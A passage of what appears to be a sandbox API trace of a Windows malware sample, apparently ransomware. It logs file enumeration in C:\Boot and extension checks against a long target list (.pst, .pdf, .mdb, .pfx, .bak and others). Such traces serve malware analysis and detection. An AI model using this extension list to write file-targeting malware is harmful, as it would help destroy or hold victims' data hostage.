4 [0286.016] lstrcmpiW (lpString1=".dwt", lpString2=".mui") returned -1 [0286.016] lstrlenW (lpString=".dx") returned 3 [0286.016] lstrcmpiW (lpString1=".dx", lpString2="mui") returned -1 [0286.016] lstrlenW (lpString=".dxf") returned 4 [0286.016] lstrcmpiW (lpString1=".dxf", lpString2=".mui") returned -1 [0286.016] lstrlenW (lpString=".edml") returned 5 [0286.016] lstrcmpiW (lpString1=".edml", lpString2="e.mui") returned -1 [0286.016] lstrlenW (lpString=".efd") returned 4 [0286.016] lstrcmpiW (lpString1=".efd", lpString2=".mui") returned -1 [0286.016] lstrlenW (lpString=".elf") returned 4 [0286.016] lstrcmpiW (lpString1=".elf", lpString2=".mui") returned -1 [0286.016] lstrlenW (lpString=".emf") returned 4 [0286.016] lstrcmpiW (lpString1=".emf", lpString2=".mui") returned -1 [0286.016] lstrlenW (lpString=".emz") returned 4 [0286.016] lstrcmpiW (lpString1=".emz", lpString2=".mui") returned -1 [0286.016] lstrlenW (lpString=".epf") returned 4 [0286.016] lstrcmpiW (lpString1=".epf", lpString2=".mui") returned -1 [0286.016] lstrlenW (lpString=".eps") returned 4 [0286.016] lstrcmpiW (lpString1=".eps", lpString2=".mui") returned -1 [0286.016] lstrlenW (lpString=".epsf") returned 5 [0286.016] lstrcmpiW (lpString1=".epsf", lpString2="e.mui") returned -1 [0286.017] lstrlenW (lpString=".epsp") returned 5 [0286.017] lstrcmpiW (lpString1=".epsp", lpString2="e.mui") returned -1 [0286.017] lstrlenW (lpString=".erf") returned 4 [0286.017] lstrcmpiW (lpString1=".erf", lpString2=".mui") returned -1 [0286.017] lstrlenW (lpString=".exr") returned 4 [0286.017] lstrcmpiW (lpString1=".exr", lpString2=".mui") returned -1 [0286.017] lstrlenW (lpString=".f4v") returned 4 [0286.017] lstrcmpiW (lpString1=".f4v", lpString2=".mui") returned -1 [0286.017] lstrlenW (lpString=".fido") returned 5 [0286.017] lstrcmpiW (lpString1=".fido", lpString2="e.mui") returned -1 [0286.017] lstrlenW (lpString=".flm") returned 4 [0286.017] lstrcmpiW (lpString1=".flm", lpString2=".mui") returned -1 [0286.017] lstrlenW (lpString=".flv") returned 4 [0286.017] lstrcmpiW (lpString1=".flv", lpString2=".mui") returned -1 [0286.017] lstrlenW (lpString=".frm") returned 4 [0286.017] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0286.017] lstrlenW (lpString=".fxg") returned 4 [0286.017] lstrcmpiW (lpString1=".fxg", lpString2=".mui") returned -1 [0286.017] lstrlenW (lpString=".geo") returned 4 [0286.017] lstrcmpiW (lpString1=".geo", lpString2=".mui") returned -1 [0286.017] lstrlenW (lpString=".gif") returned 4 [0286.017] lstrcmpiW (lpString1=".gif", lpString2=".mui") returned -1 [0286.017] lstrlenW (lpString=".grs") returned 4 [0286.017] lstrcmpiW (lpString1=".grs", lpString2=".mui") returned -1 [0286.017] lstrlenW (lpString=".gz") returned 3 [0286.017] lstrcmpiW (lpString1=".gz", lpString2="mui") returned -1 [0286.017] lstrlenW (lpString=".h") returned 2 [0286.017] lstrcmpiW (lpString1=".h", lpString2="ui") returned -1 [0286.017] lstrlenW (lpString=".hdr") returned 4 [0286.017] lstrcmpiW (lpString1=".hdr", lpString2=".mui") returned -1 [0286.017] lstrlenW (lpString=".hpp") returned 4 [0286.017] lstrcmpiW (lpString1=".hpp", lpString2=".mui") returned -1 [0286.018] lstrlenW (lpString=".hta") returned 4 [0286.018] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0286.018] lstrlenW (lpString=".htc") returned 4 [0286.018] lstrcmpiW (lpString1=".htc", lpString2=".mui") returned -1 [0286.018] lstrlenW (lpString=".htm") returned 4 [0286.018] lstrcmpiW (lpString1=".htm", lpString2=".mui") returned -1 [0286.018] lstrlenW (lpString=".html") returned 5 [0286.018] lstrcmpiW (lpString1=".html", lpString2="e.mui") returned -1 [0286.018] lstrlenW (lpString=".icb") returned 4 [0286.018] lstrcmpiW (lpString1=".icb", lpString2=".mui") returned -1 [0286.018] lstrlenW (lpString=".ics") returned 4 [0286.018] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0286.018] lstrlenW (lpString=".iff") returned 4 [0286.018] lstrcmpiW (lpString1=".iff", lpString2=".mui") returned -1 [0286.018] lstrlenW (lpString=".inc") returned 4 [0286.018] lstrcmpiW (lpString1=".inc", lpString2=".mui") returned -1 [0286.018] lstrlenW (lpString=".indd") returned 5 [0286.018] lstrcmpiW (lpString1=".indd", lpString2="e.mui") returned -1 [0286.018] lstrlenW (lpString=".ini") returned 4 [0286.018] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0286.018] lstrlenW (lpString=".iqy") returned 4 [0286.018] lstrcmpiW (lpString1=".iqy", lpString2=".mui") returned -1 [0286.018] lstrlenW (lpString=".j2c") returned 4 [0286.018] lstrcmpiW (lpString1=".j2c", lpString2=".mui") returned -1 [0286.018] lstrlenW (lpString=".j2k") returned 4 [0286.018] lstrcmpiW (lpString1=".j2k", lpString2=".mui") returned -1 [0286.018] lstrlenW (lpString=".java") returned 5 [0286.018] lstrcmpiW (lpString1=".java", lpString2="e.mui") returned -1 [0286.018] lstrlenW (lpString=".jp2") returned 4 [0286.018] lstrcmpiW (lpString1=".jp2", lpString2=".mui") returned -1 [0286.018] lstrlenW (lpString=".jpc") returned 4 [0286.018] lstrcmpiW (lpString1=".jpc", lpString2=".mui") returned -1 [0286.019] lstrlenW (lpString=".jpe") returned 4 [0286.019] lstrcmpiW (lpString1=".jpe", lpString2=".mui") returned -1 [0286.019] lstrlenW (lpString=".jpeg") returned 5 [0286.019] lstrcmpiW (lpString1=".jpeg", lpString2="e.mui") returned -1 [0286.019] lstrlenW (lpString=".jpf") returned 4 [0286.019] lstrcmpiW (lpString1=".jpf", lpString2=".mui") returned -1 [0286.019] lstrlenW (lpString=".jpg") returned 4 [0286.019] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.019] lstrlenW (lpString=".jpx") returned 4 [0286.019] lstrcmpiW (lpString1=".jpx", lpString2=".mui") returned -1 [0286.019] lstrlenW (lpString=".js") returned 3 [0286.019] lstrcmpiW (lpString1=".js", lpString2="mui") returned -1 [0286.019] lstrlenW (lpString=".jsf") returned 4 [0286.019] lstrcmpiW (lpString1=".jsf", lpString2=".mui") returned -1 [0286.019] lstrlenW (lpString=".json") returned 5 [0286.019] lstrcmpiW (lpString1=".json", lpString2="e.mui") returned -1 [0286.019] lstrlenW (lpString=".jsp") returned 4 [0286.019] lstrcmpiW (lpString1=".jsp", lpString2=".mui") returned -1 [0286.019] lstrlenW (lpString=".kdc") returned 4 [0286.019] lstrcmpiW (lpString1=".kdc", lpString2=".mui") returned -1 [0286.019] lstrlenW (lpString=".kmz") returned 4 [0286.019] lstrcmpiW (lpString1=".kmz", lpString2=".mui") returned -1 [0286.019] lstrlenW (lpString=".kwm") returned 4 [0286.019] lstrcmpiW (lpString1=".kwm", lpString2=".mui") returned -1 [0286.019] lstrlenW (lpString=".lasso") returned 6 [0286.019] lstrcmpiW (lpString1=".lasso", lpString2="xe.mui") returned -1 [0286.019] lstrlenW (lpString=".lbi") returned 4 [0286.020] lstrcmpiW (lpString1=".lbi", lpString2=".mui") returned -1 [0286.020] lstrlenW (lpString=".lgf") returned 4 [0286.020] lstrcmpiW (lpString1=".lgf", lpString2=".mui") returned -1 [0286.020] lstrlenW (lpString=".lgp") returned 4 [0286.020] lstrcmpiW (lpString1=".lgp", lpString2=".mui") returned -1 [0286.020] lstrlenW (lpString=".log") returned 4 [0286.020] lstrcmpiW (lpString1=".log", lpString2=".mui") returned -1 [0286.020] lstrlenW (lpString=".m1v") returned 4 [0286.020] lstrcmpiW (lpString1=".m1v", lpString2=".mui") returned -1 [0286.020] lstrlenW (lpString=".m4a") returned 4 [0286.020] lstrcmpiW (lpString1=".m4a", lpString2=".mui") returned -1 [0286.020] lstrlenW (lpString=".m4v") returned 4 [0286.020] lstrcmpiW (lpString1=".m4v", lpString2=".mui") returned -1 [0286.020] lstrlenW (lpString=".max") returned 4 [0286.020] lstrcmpiW (lpString1=".max", lpString2=".mui") returned -1 [0286.020] lstrlenW (lpString=".md") returned 3 [0286.020] lstrcmpiW (lpString1=".md", lpString2="mui") returned -1 [0286.020] lstrlenW (lpString=".mda") returned 4 [0286.020] lstrcmpiW (lpString1=".mda", lpString2=".mui") returned -1 [0286.020] lstrlenW (lpString=".mdb") returned 4 [0286.020] lstrcmpiW (lpString1=".mdb", lpString2=".mui") returned -1 [0286.020] lstrlenW (lpString=".mde") returned 4 [0286.020] lstrcmpiW (lpString1=".mde", lpString2=".mui") returned -1 [0286.020] lstrlenW (lpString=".mdf") returned 4 [0286.020] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0286.020] lstrlenW (lpString=".mdw") returned 4 [0286.020] lstrcmpiW (lpString1=".mdw", lpString2=".mui") returned -1 [0286.020] lstrlenW (lpString=".mef") returned 4 [0286.020] lstrcmpiW (lpString1=".mef", lpString2=".mui") returned -1 [0286.021] lstrlenW (lpString=".mft") returned 4 [0286.021] lstrcmpiW (lpString1=".mft", lpString2=".mui") returned -1 [0286.021] lstrlenW (lpString=".mfw") returned 4 [0286.021] lstrcmpiW (lpString1=".mfw", lpString2=".mui") returned -1 [0286.021] lstrlenW (lpString=".mht") returned 4 [0286.021] lstrcmpiW (lpString1=".mht", lpString2=".mui") returned -1 [0286.021] lstrlenW (lpString=".mhtml") returned 6 [0286.021] lstrcmpiW (lpString1=".mhtml", lpString2="xe.mui") returned -1 [0286.021] lstrlenW (lpString=".mka") returned 4 [0286.021] lstrcmpiW (lpString1=".mka", lpString2=".mui") returned -1 [0286.021] lstrlenW (lpString=".mkidx") returned 6 [0286.021] lstrcmpiW (lpString1=".mkidx", lpString2="xe.mui") returned -1 [0286.021] lstrlenW (lpString=".mkv") returned 4 [0286.021] lstrcmpiW (lpString1=".mkv", lpString2=".mui") returned -1 [0286.021] lstrlenW (lpString=".mos") returned 4 [0286.021] lstrcmpiW (lpString1=".mos", lpString2=".mui") returned -1 [0286.021] lstrlenW (lpString=".mov") returned 4 [0286.021] lstrcmpiW (lpString1=".mov", lpString2=".mui") returned -1 [0286.021] lstrlenW (lpString=".mp3") returned 4 [0286.021] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0286.021] lstrlenW (lpString=".mp4") returned 4 [0286.021] lstrcmpiW (lpString1=".mp4", lpString2=".mui") returned -1 [0286.021] lstrlenW (lpString=".mpeg") returned 5 [0286.021] lstrcmpiW (lpString1=".mpeg", lpString2="e.mui") returned -1 [0286.021] lstrlenW (lpString=".mpg") returned 4 [0286.021] lstrcmpiW (lpString1=".mpg", lpString2=".mui") returned -1 [0286.021] lstrlenW (lpString=".mpv") returned 4 [0286.021] lstrcmpiW (lpString1=".mpv", lpString2=".mui") returned -1 [0286.021] lstrlenW (lpString=".mrw") returned 4 [0286.021] lstrcmpiW (lpString1=".mrw", lpString2=".mui") returned -1 [0286.021] lstrlenW (lpString=".msg") returned 4 [0286.022] lstrcmpiW (lpString1=".msg", lpString2=".mui") returned -1 [0286.022] lstrlenW (lpString=".mxl") returned 4 [0286.022] lstrcmpiW (lpString1=".mxl", lpString2=".mui") returned 1 [0286.022] lstrlenW (lpString=".myd") returned 4 [0286.022] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0286.022] lstrlenW (lpString=".myi") returned 4 [0286.022] lstrcmpiW (lpString1=".myi", lpString2=".mui") returned 1 [0286.022] lstrlenW (lpString=".nef") returned 4 [0286.022] lstrcmpiW (lpString1=".nef", lpString2=".mui") returned 1 [0286.022] lstrlenW (lpString=".nrw") returned 4 [0286.022] lstrcmpiW (lpString1=".nrw", lpString2=".mui") returned 1 [0286.022] lstrlenW (lpString=".obj") returned 4 [0286.022] lstrcmpiW (lpString1=".obj", lpString2=".mui") returned 1 [0286.022] lstrlenW (lpString=".odb") returned 4 [0286.022] lstrcmpiW (lpString1=".odb", lpString2=".mui") returned 1 [0286.022] lstrlenW (lpString=".odc") returned 4 [0286.022] lstrcmpiW (lpString1=".odc", lpString2=".mui") returned 1 [0286.022] lstrlenW (lpString=".odm") returned 4 [0286.022] lstrcmpiW (lpString1=".odm", lpString2=".mui") returned 1 [0286.022] lstrlenW (lpString=".odp") returned 4 [0286.022] lstrcmpiW (lpString1=".odp", lpString2=".mui") returned 1 [0286.022] lstrlenW (lpString=".ods") returned 4 [0286.022] lstrcmpiW (lpString1=".ods", lpString2=".mui") returned 1 [0286.022] lstrlenW (lpString=".oft") returned 4 [0286.022] lstrcmpiW (lpString1=".oft", lpString2=".mui") returned 1 [0286.022] lstrlenW (lpString=".one") returned 4 [0286.022] lstrcmpiW (lpString1=".one", lpString2=".mui") returned 1 [0286.022] lstrlenW (lpString=".onepkg") returned 7 [0286.023] lstrcmpiW (lpString1=".onepkg", lpString2="exe.mui") returned -1 [0286.023] lstrlenW (lpString=".onetoc2") returned 8 [0286.023] lstrcmpiW (lpString1=".onetoc2", lpString2=".exe.mui") returned 1 [0286.023] lstrlenW (lpString=".opt") returned 4 [0286.023] lstrcmpiW (lpString1=".opt", lpString2=".mui") returned 1 [0286.023] lstrlenW (lpString=".oqy") returned 4 [0286.023] lstrcmpiW (lpString1=".oqy", lpString2=".mui") returned 1 [0286.023] lstrlenW (lpString=".orf") returned 4 [0286.023] lstrcmpiW (lpString1=".orf", lpString2=".mui") returned 1 [0286.023] lstrlenW (lpString=".p12") returned 4 [0286.023] lstrcmpiW (lpString1=".p12", lpString2=".mui") returned 1 [0286.023] lstrlenW (lpString=".p7b") returned 4 [0286.023] lstrcmpiW (lpString1=".p7b", lpString2=".mui") returned 1 [0286.023] lstrlenW (lpString=".p7c") returned 4 [0286.023] lstrcmpiW (lpString1=".p7c", lpString2=".mui") returned 1 [0286.023] lstrlenW (lpString=".pam") returned 4 [0286.023] lstrcmpiW (lpString1=".pam", lpString2=".mui") returned 1 [0286.023] lstrlenW (lpString=".pbm") returned 4 [0286.023] lstrcmpiW (lpString1=".pbm", lpString2=".mui") returned 1 [0286.023] lstrlenW (lpString=".pct") returned 4 [0286.023] lstrcmpiW (lpString1=".pct", lpString2=".mui") returned 1 [0286.023] lstrlenW (lpString=".pcx") returned 4 [0286.023] lstrcmpiW (lpString1=".pcx", lpString2=".mui") returned 1 [0286.023] lstrlenW (lpString=".pdd") returned 4 [0286.023] lstrcmpiW (lpString1=".pdd", lpString2=".mui") returned 1 [0286.023] lstrlenW (lpString=".pdf") returned 4 [0286.023] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.023] lstrlenW (lpString=".pdp") returned 4 [0286.024] lstrcmpiW (lpString1=".pdp", lpString2=".mui") returned 1 [0286.024] lstrlenW (lpString=".pef") returned 4 [0286.024] lstrcmpiW (lpString1=".pef", lpString2=".mui") returned 1 [0286.024] lstrlenW (lpString=".pem") returned 4 [0286.024] lstrcmpiW (lpString1=".pem", lpString2=".mui") returned 1 [0286.024] lstrlenW (lpString=".pff") returned 4 [0286.024] lstrcmpiW (lpString1=".pff", lpString2=".mui") returned 1 [0286.024] lstrlenW (lpString=".pfm") returned 4 [0286.024] lstrcmpiW (lpString1=".pfm", lpString2=".mui") returned 1 [0286.024] lstrlenW (lpString=".pfx") returned 4 [0286.024] lstrcmpiW (lpString1=".pfx", lpString2=".mui") returned 1 [0286.024] lstrlenW (lpString=".pgm") returned 4 [0286.024] lstrcmpiW (lpString1=".pgm", lpString2=".mui") returned 1 [0286.024] lstrlenW (lpString=".php") returned 4 [0286.024] lstrcmpiW (lpString1=".php", lpString2=".mui") returned 1 [0286.024] lstrlenW (lpString=".php3") returned 5 [0286.024] lstrcmpiW (lpString1=".php3", lpString2="e.mui") returned -1 [0286.024] lstrlenW (lpString=".php4") returned 5 [0286.024] lstrcmpiW (lpString1=".php4", lpString2="e.mui") returned -1 [0286.024] lstrlenW (lpString=".php5") returned 5 [0286.024] lstrcmpiW (lpString1=".php5", lpString2="e.mui") returned -1 [0286.024] lstrlenW (lpString=".phtml") returned 6 [0286.024] lstrcmpiW (lpString1=".phtml", lpString2="xe.mui") returned -1 [0286.024] lstrlenW (lpString=".pict") returned 5 [0286.024] lstrcmpiW (lpString1=".pict", lpString2="e.mui") returned -1 [0286.024] lstrlenW (lpString=".pl") returned 3 [0286.024] lstrcmpiW (lpString1=".pl", lpString2="mui") returned -1 [0286.024] lstrlenW (lpString=".pls") returned 4 [0286.024] lstrcmpiW (lpString1=".pls", lpString2=".mui") returned 1 [0286.024] lstrlenW (lpString=".pm") returned 3 [0286.024] lstrcmpiW (lpString1=".pm", lpString2="mui") returned -1 [0286.025] lstrlenW (lpString=".png") returned 4 [0286.025] lstrcmpiW (lpString1=".png", lpString2=".mui") returned 1 [0286.025] lstrlenW (lpString=".pnm") returned 4 [0286.025] lstrcmpiW (lpString1=".pnm", lpString2=".mui") returned 1 [0286.025] lstrlenW (lpString=".pot") returned 4 [0286.025] lstrcmpiW (lpString1=".pot", lpString2=".mui") returned 1 [0286.025] lstrlenW (lpString=".potm") returned 5 [0286.025] lstrcmpiW (lpString1=".potm", lpString2="e.mui") returned -1 [0286.025] lstrlenW (lpString=".potx") returned 5 [0286.025] lstrcmpiW (lpString1=".potx", lpString2="e.mui") returned -1 [0286.025] lstrlenW (lpString=".ppa") returned 4 [0286.025] lstrcmpiW (lpString1=".ppa", lpString2=".mui") returned 1 [0286.025] lstrlenW (lpString=".ppam") returned 5 [0286.025] lstrcmpiW (lpString1=".ppam", lpString2="e.mui") returned -1 [0286.025] lstrlenW (lpString=".ppm") returned 4 [0286.025] lstrcmpiW (lpString1=".ppm", lpString2=".mui") returned 1 [0286.025] lstrlenW (lpString=".pps") returned 4 [0286.025] lstrcmpiW (lpString1=".pps", lpString2=".mui") returned 1 [0286.025] lstrlenW (lpString=".ppsm") returned 5 [0286.025] lstrcmpiW (lpString1=".ppsm", lpString2="e.mui") returned -1 [0286.025] lstrlenW (lpString=".ppt") returned 4 [0286.025] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.025] lstrlenW (lpString=".pptm") returned 5 [0286.025] lstrcmpiW (lpString1=".pptm", lpString2="e.mui") returned -1 [0286.025] lstrlenW (lpString=".pptx") returned 5 [0286.025] lstrcmpiW (lpString1=".pptx", lpString2="e.mui") returned -1 [0286.025] lstrlenW (lpString=".prn") returned 4 [0286.025] lstrcmpiW (lpString1=".prn", lpString2=".mui") returned 1 [0286.026] lstrlenW (lpString=".ps") returned 3 [0286.026] lstrcmpiW (lpString1=".ps", lpString2="mui") returned -1 [0286.026] lstrlenW (lpString=".psb") returned 4 [0286.026] lstrcmpiW (lpString1=".psb", lpString2=".mui") returned 1 [0286.026] lstrlenW (lpString=".psd") returned 4 [0286.026] lstrcmpiW (lpString1=".psd", lpString2=".mui") returned 1 [0286.026] lstrlenW (lpString=".pst") returned 4 [0286.026] lstrcmpiW (lpString1=".pst", lpString2=".mui") returned 1 [0286.026] lstrlenW (lpString=".ptx") returned 4 [0286.026] lstrcmpiW (lpString1=".ptx", lpString2=".mui") returned 1 [0286.026] lstrlenW (lpString=".pub") returned 4 [0286.026] lstrcmpiW (lpString1=".pub", lpString2=".mui") returned 1 [0286.026] lstrlenW (lpString=".pwm") returned 4 [0286.026] lstrcmpiW (lpString1=".pwm", lpString2=".mui") returned 1 [0286.026] lstrlenW (lpString=".pxr") returned 4 [0286.026] lstrcmpiW (lpString1=".pxr", lpString2=".mui") returned 1 [0286.026] lstrlenW (lpString=".py") returned 3 [0286.026] lstrcmpiW (lpString1=".py", lpString2="mui") returned -1 [0286.026] lstrlenW (lpString=".qt") returned 3 [0286.026] lstrcmpiW (lpString1=".qt", lpString2="mui") returned -1 [0286.026] lstrlenW (lpString=".r3d") returned 4 [0286.026] lstrcmpiW (lpString1=".r3d", lpString2=".mui") returned 1 [0286.026] lstrlenW (lpString=".raf") returned 4 [0286.026] lstrcmpiW (lpString1=".raf", lpString2=".mui") returned 1 [0286.026] lstrlenW (lpString=".rar") returned 4 [0286.026] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.027] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0286.027] FindClose (in: hFindFile=0x3947fe8 | out: hFindFile=0x3947fe8) returned 1 [0286.027] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0286.027] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010c5ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5c171b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0286.027] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0286.027] lstrlenW (lpString="C:\\Boot\\hu-HU") returned 13 [0286.027] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010c5ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5c171b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x39482e8 [0286.027] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010c5ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5c171b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.028] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13360, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0286.028] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0286.028] lstrlenW (lpString=".1cd") returned 4 [0286.028] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.028] lstrlenW (lpString=".3ds") returned 4 [0286.028] lstrcmpiW (lpString1=".3ds", lpString2=".mui") returned -1 [0286.028] lstrlenW (lpString=".3fr") returned 4 [0286.028] lstrcmpiW (lpString1=".3fr", lpString2=".mui") returned -1 [0286.028] lstrlenW (lpString=".3g2") returned 4 [0286.028] lstrcmpiW (lpString1=".3g2", lpString2=".mui") returned -1 [0286.028] lstrlenW (lpString=".3gp") returned 4 [0286.028] lstrcmpiW (lpString1=".3gp", lpString2=".mui") returned -1 [0286.028] lstrlenW (lpString=".7z") returned 3 [0286.028] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.028] lstrlenW (lpString=".accda") returned 6 [0286.028] lstrcmpiW (lpString1=".accda", lpString2="xe.mui") returned -1 [0286.028] lstrlenW (lpString=".accdb") returned 6 [0286.028] lstrcmpiW (lpString1=".accdb", lpString2="xe.mui") returned -1 [0286.028] lstrlenW (lpString=".accdc") returned 6 [0286.028] lstrcmpiW (lpString1=".accdc", lpString2="xe.mui") returned -1 [0286.028] lstrlenW (lpString=".accde") returned 6 [0286.028] lstrcmpiW (lpString1=".accde", lpString2="xe.mui") returned -1 [0286.028] lstrlenW (lpString=".accdt") returned 6 [0286.028] lstrcmpiW (lpString1=".accdt", lpString2="xe.mui") returned -1 [0286.028] lstrlenW (lpString=".accdw") returned 6 [0286.028] lstrcmpiW (lpString1=".accdw", lpString2="xe.mui") returned -1 [0286.028] lstrlenW (lpString=".adb") returned 4 [0286.028] lstrcmpiW (lpString1=".adb", lpString2=".mui") returned -1 [0286.028] lstrlenW (lpString=".adp") returned 4 [0286.029] lstrcmpiW (lpString1=".adp", lpString2=".mui") returned -1 [0286.029] lstrlenW (lpString=".ai") returned 3 [0286.029] lstrcmpiW (lpString1=".ai", lpString2="mui") returned -1 [0286.029] lstrlenW (lpString=".ai3") returned 4 [0286.029] lstrcmpiW (lpString1=".ai3", lpString2=".mui") returned -1 [0286.029] lstrlenW (lpString=".ai4") returned 4 [0286.029] lstrcmpiW (lpString1=".ai4", lpString2=".mui") returned -1 [0286.029] lstrlenW (lpString=".ai5") returned 4 [0286.029] lstrcmpiW (lpString1=".ai5", lpString2=".mui") returned -1 [0286.029] lstrlenW (lpString=".ai6") returned 4 [0286.029] lstrcmpiW (lpString1=".ai6", lpString2=".mui") returned -1 [0286.029] lstrlenW (lpString=".ai7") returned 4 [0286.029] lstrcmpiW (lpString1=".ai7", lpString2=".mui") returned -1 [0286.029] lstrlenW (lpString=".ai8") returned 4 [0286.029] lstrcmpiW (lpString1=".ai8", lpString2=".mui") returned -1 [0286.029] lstrlenW (lpString=".anim") returned 5 [0286.029] lstrcmpiW (lpString1=".anim", lpString2="e.mui") returned -1 [0286.029] lstrlenW (lpString=".arw") returned 4 [0286.029] lstrcmpiW (lpString1=".arw", lpString2=".mui") returned -1 [0286.029] lstrlenW (lpString=".as") returned 3 [0286.029] lstrcmpiW (lpString1=".as", lpString2="mui") returned -1 [0286.029] lstrlenW (lpString=".asa") returned 4 [0286.029] lstrcmpiW (lpString1=".asa", lpString2=".mui") returned -1 [0286.029] lstrlenW (lpString=".asc") returned 4 [0286.029] lstrcmpiW (lpString1=".asc", lpString2=".mui") returned -1 [0286.030] lstrlenW (lpString=".ascx") returned 5 [0286.030] lstrcmpiW (lpString1=".ascx", lpString2="e.mui") returned -1 [0286.030] lstrlenW (lpString=".asm") returned 4 [0286.030] lstrcmpiW (lpString1=".asm", lpString2=".mui") returned -1 [0286.030] lstrlenW (lpString=".asmx") returned 5 [0286.030] lstrcmpiW (lpString1=".asmx", lpString2="e.mui") returned -1 [0286.030] lstrlenW (lpString=".asp") returned 4 [0286.030] lstrcmpiW (lpString1=".asp", lpString2=".mui") returned -1 [0286.030] lstrlenW (lpString=".aspx") returned 5 [0286.030] lstrcmpiW (lpString1=".aspx", lpString2="e.mui") returned -1 [0286.030] lstrlenW (lpString=".asr") returned 4 [0286.030] lstrcmpiW (lpString1=".asr", lpString2=".mui") returned -1 [0286.030] lstrlenW (lpString=".asx") returned 4 [0286.030] lstrcmpiW (lpString1=".asx", lpString2=".mui") returned -1 [0286.030] lstrlenW (lpString=".avi") returned 4 [0286.030] lstrcmpiW (lpString1=".avi", lpString2=".mui") returned -1 [0286.030] lstrlenW (lpString=".avs") returned 4 [0286.030] lstrcmpiW (lpString1=".avs", lpString2=".mui") returned -1 [0286.030] lstrlenW (lpString=".backup") returned 7 [0286.030] lstrcmpiW (lpString1=".backup", lpString2="exe.mui") returned -1 [0286.030] lstrlenW (lpString=".bak") returned 4 [0286.030] lstrcmpiW (lpString1=".bak", lpString2=".mui") returned -1 [0286.030] lstrlenW (lpString=".bay") returned 4 [0286.030] lstrcmpiW (lpString1=".bay", lpString2=".mui") returned -1 [0286.030] lstrlenW (lpString=".bd") returned 3 [0286.030] lstrcmpiW (lpString1=".bd", lpString2="mui") returned -1 [0286.030] lstrlenW (lpString=".bin") returned 4 [0286.030] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0286.030] lstrlenW (lpString=".bmp") returned 4 [0286.030] lstrcmpiW (lpString1=".bmp", lpString2=".mui") returned -1 [0286.030] lstrlenW (lpString=".bz2") returned 4 [0286.031] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.031] lstrlenW (lpString=".c") returned 2 [0286.031] lstrcmpiW (lpString1=".c", lpString2="ui") returned -1 [0286.031] lstrlenW (lpString=".cdr") returned 4 [0286.031] lstrcmpiW (lpString1=".cdr", lpString2=".mui") returned -1 [0286.031] lstrlenW (lpString=".cer") returned 4 [0286.031] lstrcmpiW (lpString1=".cer", lpString2=".mui") returned -1 [0286.031] lstrlenW (lpString=".cf") returned 3 [0286.031] lstrcmpiW (lpString1=".cf", 